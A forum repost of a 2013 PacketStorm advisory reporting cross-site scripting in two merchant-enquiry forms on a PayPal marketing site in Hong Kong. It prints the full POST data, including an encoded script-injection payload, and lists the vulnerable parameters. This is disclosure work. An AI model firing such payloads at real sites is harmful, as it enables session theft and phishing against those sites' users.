Praetorian503 Posted February 16, 2013 Report Posted February 16, 2013 The www.paypal-marketing.com.hk site suffers from multiple cross site scripting vulnerabilities.--- Vulnerability # No- 1:+URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index.php+Vulnerability Type: Cross Site Scripting (XSS)+ Form Action : POST+POST Data Sent to Produce the Bug :token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1--Here, the field name with field value vulnerable_field are all vulnerableto cross site scripting .And, the filed name (company_name) with value%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and usedhere to produce the XSS bug here .+POST Parameters that cause XSS Vulnerability in this Page :company_name , business_type_other,business_need_other, contact_person,contact_person2, phone,phone2, email,email2+How to fix :-- Though this page uses a java script function to validate this form, butit fails to sanitize the all characters which could allow hackers or pentesters to return malicious on webpage like Cross Site Scripting attack+ Screenshot : Attached with this mail----------------------------------------------------------------------------Vulnerability No. # 2 :+URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php+Vulnerability Type: Cross Site Scripting (XSS)+ Form Action : POST+POST Data Sent to Produce the Bug :token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1--Here, the field name with field value vulnerable_field are all vulnerableto cross site scripting .And, the filed name (company_name) with value%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and usedhere to produce the XSS bug here .+POST Parameters that cause XSS Vulnerability in this Page :company_name , business_type_other,business_need_other, contact_person,contact_person2, phone,phone2, email,email2+How to fix :-- Though this page uses a java script function to validate this form, butit fails to sanitize the all characters which could allow hackers or pentesters to return malicious on webpage like Cross Site Scripting attack+ Screenshot : Attached with this mailThanking YouMahadev SubediSource: PacketStorm Quote